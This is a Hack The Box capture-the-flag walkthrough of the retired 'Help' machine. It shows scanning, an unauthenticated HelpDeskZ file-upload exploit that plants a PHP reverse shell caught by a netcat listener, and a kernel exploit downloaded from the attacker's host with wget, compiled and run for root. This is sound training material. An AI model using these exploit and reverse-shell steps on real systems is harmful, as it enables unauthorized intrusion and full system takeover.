โ€ข 1 min read

Hack the Box - Help

๐Ÿ‘‹๐Ÿผ๐Ÿ‘‹๐Ÿผ Hello world! โœŒ๏ธ

Recently, I've just started rooting machine on Hack The Box (when I'm stress xD) and have rooted some easy machines ๐Ÿ˜‚. I found that it is fun and challenging. By the way Help is retired and this is my walkthrough.

Information

  • OS: Linux
  • IP: 10.10.10.121
  • Difficulty: Easy

Enumeration

Nmap scan result:

# nmap -sV -sC -A -Pn 10.10.10.121
Starting Nmap 7.30 ( https://nmap.org ) at 2019-06-05 14:45 KST
Nmap scan report for 10.10.10.121
Host is up (0.31s latency).
Not shown: 995 closed ports
PORT      STATE    SERVICE  VERSION
22/tcp    open     ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
|_  256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
80/tcp    open     http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
1119/tcp  filtered bnetgame
3000/tcp  open     http     Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
25734/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.71 seconds

Seeing port 80 was opend, I opened http://10.10.10.121/ on browser but didn't see interested thing. It was just a default page of Apache.

Apache default page

Then, I opend http://10.10.10.121:3000/ which also was a HTTP service and it showed a JSON messages.

{
  "message": "Hi Shiv, To get access please find the credentials with given query"
}

Directory scanning

I used dirb to scan directories on port 80 and got this result.

# dirb http://10.10.10.121/ /usr/share/dirb/wordlists/small.txt

----------------
DIRB v2.22
By The Dark Raver
----------------

START_TIME: Wed Jun  5 05:24:13 2019
URL_BASE: http://10.10.10.121/
WORDLIST_FILES: /usr/share/dirb/wordlists/small.txt

----------------

GENERATED WORDS: 959

---- Scanning URL: http://10.10.10.121/ ----
==> DIRECTORY: http://10.10.10.121/javascript/
==> DIRECTORY: http://10.10.10.121/support/

---- Entering directory: http://10.10.10.121/javascript/ ----

---- Entering directory: http://10.10.10.121/support/ ----
==> DIRECTORY: http://10.10.10.121/support/css/
==> DIRECTORY: http://10.10.10.121/support/images/
==> DIRECTORY: http://10.10.10.121/support/includes/
==> DIRECTORY: http://10.10.10.121/support/js/
==> DIRECTORY: http://10.10.10.121/support/uploads/
==> DIRECTORY: http://10.10.10.121/support/views/

---- Entering directory: http://10.10.10.121/support/css/ ----

(!) FATAL: Too many errors connecting to host
(Possible cause: COULDNT CONNECT)

-----------------
END_TIME: Wed Jun  5 05:47:35 2019
DOWNLOADED: 3050 - FOUND: 0

Shell uploading

ERROR, there were too many requests to this server I guessed but there were 2 directories look interesting from the result.

I found a page with form and file upload and I guessed that the uploaded file will be stored inside http://10.10.10.121/support/uploads/.

HelpDeskZ

I uploaded a php reverse shell and tried to find it in /support/uploads/ but the file name was changed. And I was going to search google for HelpDeskZ but google suggested me with exploit keyword LoLz.

Oh, if you got a message File is not allowed. don't worry. File was aready uploaded before showing this message. You can check the source code of its upload process here.

HelpDeskZ

Then I used searchsploit instead of google for searching for its exploit.

# searchsploit helpdeskz
--------------------------------------------- ---------------------------------------
Exploit Title                               |  Path
| (/usr/share/exploitdb/)
--------------------------------------------- ---------------------------------------
HelpDeskZ 1.0.2 - Arbitrary File Upload      | exploits/php/webapps/40300.py
HelpDeskZ < 1.0.2 - (Autenticated) SQL Injec | exploits/php/webapps/41200.py
--------------------------------------------- ---------------------------------------
Shellcodes: No Result

Let's run the python script.

# python /usr/share/exploitdb/exploits/php/webapps/40300.py
Helpdeskz v1.0.2 - Unauthenticated shell upload exploit
Usage: help.py [baseUrl] [nameOfUploadedFile]

Now run it again with URL and uploaded php reverse shell file name. The shortest name will make the process faster, so I named it to a.php.

# python /usr/share/exploitdb/exploits/php/webapps/40300.py http://10.10.10.121/support/uploads/tickets/ a.php

Because of a.php is a reverse shell, so I run netcat -lvnp 1234 as the reverse shell listener at the same time.

Spawned! Let's find the user flag.

# netcat -lvnp 1234
Connection from 10.10.10.121:48570
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
01:14:45 up  2:15,  1 user,  load average: 7.90, 13.13, 12.52
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
help     pts/1    10.10.12.240     23:59   29.00s  0.60s  0.60s -bash
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
help@help:/$ id
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
help@help:/$ cd /home/help
help@help:/home/help$ ls -l
total 12
drwxrwxrwx 6 root root 4096 Jun  5 00:47 help
-rw-rw-r-- 1 help help  946 Nov 28  2018 npm-debug.log
-rw-r--r-- 1 root root   33 Nov 28  2018 user.txt
help@help:/home/help$ cat user.txt
cat user.txt
bb****************************af

Get access to Root

I've checked the kernel version of this machine and search for exploit.

help@help:/home/help$ uname -a
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

I found this exploit and it worked for the version of this machine.

help@help:/home/help$ wget http://10.10.12.126:3000/files/upstream44.c
--2019-06-05 01:19:38--  http://10.10.12.126:3000/files/upstream44.c
Connecting to 10.10.12.126:3000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5776 (5.6K) [text/x-c]
Saving to: 'upstream44.c'

upstream44.c        100%[===================>]   5.64K  15.5KB/s    in 0.4s    

2019-06-05 01:19:40 (15.5 KB/s) - 'upstream44.c' saved [5776/5776]

help@help:/home/help$ gcc -o root upstream44.c
help@help:/home/help$ ./root
task_struct = ffff880007e9e200
uidptr = ffff880007f23384
spawning root shell
root@help:/home/help# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare),1000(help)
root@help:/home/help# cat /root/root.txt
b7****************************98

Rooted, I hope you enjoy this ^^

SHARE THIS POST